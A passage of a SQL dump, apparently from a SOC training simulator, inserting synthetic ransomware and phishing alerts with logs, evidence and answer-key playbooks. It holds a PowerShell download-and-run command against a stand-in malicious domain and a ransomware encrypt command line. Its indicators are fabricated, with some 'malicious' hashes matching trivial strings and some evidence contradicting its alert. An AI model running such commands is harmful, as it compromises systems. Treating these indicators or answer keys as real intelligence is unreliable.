(1597, 'Malicious Payload Execution Detected', 'critical', 'Endpoint Detection and Response (EDR) Tools', 'The EDR tool detected the execution of a known ransomware payload associated with the Egregor group. The payload was executed on a critical retail system, attempting to encrypt sensitive data.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"retail_user\",\"file_path\":\"C:\\\\ProgramData\\\\ransom.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_id\":10234,\"command_line\":\"C:\\\\ProgramData\\\\ransom.exe /encrypt C:\\\\sensitive_data\",\"detection_method\":\"Signature match\",\"signatures\":[{\"name\":\"Egregor Payload\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"}]}', '2026-03-15 19:17:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised retail system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Egregor ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable linked to ransomware 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1598, 'Persistence Mechanisms Established', 'high', 'System Registry and Scheduled Tasks Logs', 'Egregor has established persistence mechanisms using registry modifications and scheduled tasks, enabling continued access to the compromised systems.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:36Z\",\"event_type\":\"Registry Modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Egregor\",\"registry_value\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"user\":\"COMPROMISED_USER\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"source_ip\":\"192.168.1.102\",\"attacker_ip\":\"45.76.89.23\",\"scheduled_task_name\":\"EgregorTask\",\"scheduled_task_command\":\"C:\\\\ProgramData\\\\Egregor\\\\egregor.exe\",\"scheduled_task_hash\":\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\",\"log_path\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\"}', '2026-03-15 19:17:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.89.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Egregor C2 server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Egregor ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.676Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:36Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Egregor\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"attacker_ip\\\":\\\"45.76.89.23\\\",\\\"scheduled_task_name\\\":\\\"EgregorTask\\\",\\\"scheduled_task_command\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Egregor\\\\\\\\egregor.exe\\\",\\\"scheduled_task_hash\\\":\\\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\\\",\\\"log_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.676Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:36Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Egregor\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k 
netsvcs\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"attacker_ip\\\":\\\"45.76.89.23\\\",\\\"scheduled_task_name\\\":\\\"EgregorTask\\\",\\\"scheduled_task_command\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Egregor\\\\\\\\egregor.exe\\\",\\\"scheduled_task_hash\\\":\\\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\\\",\\\"log_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.676Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:36Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Egregor\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"attacker_ip\\\":\\\"45.76.89.23\\\",\\\"scheduled_task_name\\\":\\\"EgregorTask\\\",\\\"scheduled_task_command\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Egregor\\\\\\\\egregor.exe\\\",\\\"scheduled_task_hash\\\":\\\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\\\",\\\"log_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.676Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:36Z\\\",\\\"event_type\\\":\\\"Registry 
Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Egregor\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"attacker_ip\\\":\\\"45.76.89.23\\\",\\\"scheduled_task_name\\\":\\\"EgregorTask\\\",\\\"scheduled_task_command\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Egregor\\\\\\\\egregor.exe\\\",\\\"scheduled_task_hash\\\":\\\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\\\",\\\"log_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.676Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:36Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Egregor\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"attacker_ip\\\":\\\"45.76.89.23\\\",\\\"scheduled_task_name\\\":\\\"EgregorTask\\\",\\\"scheduled_task_command\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Egregor\\\\\\\\egregor.exe\\\",\\\"scheduled_task_hash\\\":\\\"f8f3e8d4c5b5a1f6e2b1a9c3d4e5f8a7\\\",\\\"log_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Microsoft-Windows-TaskScheduler%4Operational.evtx\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1599, 'Lateral Movement Across Retail Network', 'critical', 'Network Traffic Analysis', 'An advanced threat actor is executing lateral movement within the retail network to spread ransomware. The operation is leveraging the Maze playbook, targeting high-value systems to amplify network disruption.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:45Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.3.15\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"maze_loader.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"network_protocol\":\"SMB\",\"action\":\"File Transfer\",\"status\":\"Success\"}', '2026-03-15 19:17:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Targeted internal host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Maze operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"maze_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File associated with Maze ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to Maze ransomware 
family.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1600, 'Exfiltration of Sensitive Retail Data', 'critical', 'Data Loss Prevention (DLP) Systems', 'Egregor APT group has exfiltrated sensitive customer and corporate data through a compromised internal host, utilizing their known strategy of double-extortion before law enforcement intervention.', 'Exfiltration', 'T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:14:07Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"file_names\":[\"customer_data_backup.zip\",\"corporate_strategy.docx\"],\"file_hashes\":[\"5d41402abc4b2a76b9719d911017c592\",\"e99a18c428cb38d5f260853678922e03\"],\"protocol\":\"HTTPS\",\"destination_port\":443}', '2026-03-15 19:17:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Egregor operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash of exfiltrated file matches known sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.691Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:14:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_names\\\":[\\\"customer_data_backup.zip\\\",\\\"corporate_strategy.docx\\\"],\\\"file_hashes\\\":[\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443}\"},{\"timestamp\":\"2026-03-15T20:57:15.691Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:14:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_names\\\":[\\\"customer_data_backup.zip\\\",\\\"corporate_strategy.docx\\\"],\\\"file_hashes\\\":[\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443}\"},{\"timestamp\":\"2026-03-15T20:56:15.691Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:14:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_names\\\":[\\\"customer_data_backup.zip\\\",\\\"corporate_strategy.docx\\\"],\\\"file_hashes\\\":[\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443}\"},{\"timestamp\":\"2026-03-15T20:55:15.691Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:14:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_names\\\":[\\\"customer_data_backup.zip\\\",\\\"corporate_strategy.docx\\\"],\\\"file_hashes\\\":[\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443}\"},{\"timestamp\":\"2026-03-15T20:54:15.691Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:14:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_names\\\":[\\\"customer_data_backup.zip\\\",\\\"corporate_strategy.docx\\\"],\\\"file_hashes\\\":[\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1601, 'Initial Access: Phishing Email Detected', 'high', 'Email Gateway Logs', 'A targeted phishing email was detected sent to a healthcare staff member. The email contained a malicious link designed to initiate an infection chain, likely leading to initial access into the network.', 'Phishing', 'T1566.001', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"email_12345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.15.32\",\"email_subject\":\"Important Update on Your Health Benefits\",\"sender_email\":\"hr-support@fakesite.com\",\"recipient_email\":\"john.doe@healthcare.example.com\",\"malicious_url\":\"http://malicious-site.com/benefits-update\",\"attachment\":\"none\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"hash\":\"3f5cfc5b1b7d4c7a9f4e1b4c4e5a4e9b\"}', '2026-03-15 19:17:34', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.15.32\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"hr-support@fakesite.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-site.com/benefits-update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious 
content.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f5cfc5b1b7d4c7a9f4e1b4c4e5a4e9b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash associated with phishing email payloads.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.701Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1602, 'Execution: Fileless PowerShell Activity', 'high', 'Endpoint Detection and Response (EDR)', 'A suspicious PowerShell script execution was detected on endpoint 192.168.1.25, initiated by user jdoe. The script was executed without leaving traces on disk, leveraging fileless techniques to evade traditional antivirus solutions. The PowerShell command attempted to download additional payloads from a suspicious domain.', 'Fileless Execution', 'T1059.001: PowerShell', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"DESKTOP-5G7HJ9K\",\"internal_ip\":\"192.168.1.25\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://malicious-domain.com/payload -OutFile $null\",\"attacker_ip\":\"203.0.113.45\",\"malicious_domain\":\"malicious-domain.com\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-15 19:17:34', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"internal\",\"details\":\"Username of the user executing the script.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used for C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware 
distribution.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash of the PowerShell command associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1603, 'Persistence: Scheduled Task Creation', 'high', 'System Event Logs', 'NetWalker affiliates establish persistence by creating a scheduled task that runs a PowerShell script at regular intervals. This task aims to maintain access on the compromised system by executing malicious payloads.', 'Persistence Mechanism', 'T1053.005', 1, 'Closed', 283, '{\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"task_arguments\":\"-ExecutionPolicy Bypass -File C:\\\\Windows\\\\Temp\\\\update.ps1\",\"task_trigger\":\"Daily\",\"task_next_run_time\":\"2023-10-10T03:00:00Z\",\"task_user\":\"SYSTEM\",\"source_ip\":\"193.104.68.132\",\"username\":\"SYSTEM\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"task_creator\":\"NT AUTHORITY\\\\SYSTEM\",\"timestamp\":\"2023-10-07T08:15:00Z\"}', '2026-03-15 19:17:34', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NetWalker 